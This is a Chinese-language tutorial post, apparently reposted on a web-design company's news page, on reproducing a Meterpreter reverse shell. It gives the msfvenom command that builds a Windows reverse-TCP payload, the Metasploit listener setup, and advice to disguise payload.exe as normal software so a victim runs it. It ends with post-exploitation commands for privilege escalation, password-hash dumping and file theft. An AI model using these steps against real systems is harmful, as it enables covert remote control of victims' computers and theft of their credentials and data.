尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

复现meterpreter

复现meterpreter
📅 发布时间:2026/6/20 14:15:24

​​​Meterpreter反向control

1.生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.xxx.xx.130 LPORT=5000 -f exe -o ~/桌面/payload.exe

-p windows/meterpreter/reverse_tcp:payload类型,windows平台的Meterpreter反向TCP连接

LHOST=192.xxx.xx.130:监听主机IP,本机的IP地址,目标将回连至此

LPORT=5000:,监听端口,本机监听的端口

-f exe:输出格式,Windows可执行文件

-o ~/桌面/payload.exe:输出路径,生成文件的保存位置

2.设置监听器

开启metasploit框架:msfconsole

配置监听模块

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.xxx.xx.130
msf5 exploit(multi/handler) > set LPORT 5000
msf5 exploit(multi/handler) > exploit

3.payload投递与执行:伪装成正常软件或者文件,等待目标用户点击payload.exe,j随后在内存中解密和执行,向监听端口(192.xxx.xx.130:5000)发起tcp连接,与本机完成握手

4.然后进行会话建立和控制:[*] Meterpreter session 1 opened (192.xxx.xx.130:5000 -> 192.xxx.xx.1:55980)

监听器工作原理

  1. 绑定端口:在192.xxx.xx.130:5000开启TCP监听

  2. 等待连接:阻塞等待目标系统连接

  3. 建立会话:连接建立后创建Meterpreter会话

  4. 加载Stage:发送后续的Stage Payload

5.信息收集与系统侦察:meterpreter > show_mount

目标磁盘分析

Meterpreter常用命令速查

系统:

1.系统信息:meterpreter > sysinfo

2.当前用户权限:meterpreter > getuid

3.进程id:meterpreter > getpid

4.进程列表:meterpreter > ps

文件:

1.当前目录:meterpreter > pwd
2.列出文件:meterpreter > ls
3.下载文件:meterpreter > download file.txt
4.上传文件:meterpreter > upload payload.exe

权限提升:

1.尝试提权到SYSTEM:meterpreter > getsystem
2.获取密码哈希:meterpreter > run post/windows/gather/hashdump

侦察:

网络配置:meterpreter > ipconfig
路由表:meterpreter > route
ARP缓存:meterpreter > arp

相关新闻

  • Arduino循迹小车通俗解释:为什么选择Uno作为主控?
  • 北京宠物训练哪家好?2025年12月狗狗训练条件和服务比较好训练基地推荐 - 品牌2026
  • ViGEmBus虚拟手柄驱动:Windows游戏控制器兼容性终极解决方案

最新新闻

  • 2026杭州市家里卫生间漏水、阳台漏水、楼顶漏水、阳台漏水、地下室渗水、阳光房漏水各种房屋漏水情况不用愁!本地防水补漏公司为您排忧解难!精准推荐附近专业防水团队 - 伶鹿到家
  • 2026年6月积家售后服务体系升级|官方维修网点最新营业地址、专属联系电话完整收录指南 - 积家中国服务中心
  • 当音乐被锁在数字牢笼:qmcdump如何重新定义你的听觉主权
  • 暗黑3终极自动化指南:如何用D3KeyHelper解放双手,提升游戏体验
  • 2026年6月积家官方维修服务线下升级公告|多地新增直营售后中心,全新线下服务网点地址统一公示 - 积家中国服务中心
  • 2026年6月最新芝柏中国官方售后电话网点服务热线客服地址 - 亨得利官方服务中心

日新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

周新闻

  • Visual C++运行库修复终极指南:5分钟快速解决Windows软件启动错误
  • 手把手教你构建统计局地区经济数据爬虫:从环境搭建到数据持久化全指南
  • 2026多Agent深度解析:用AI团队替代单一模型,四种架构实战落地

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号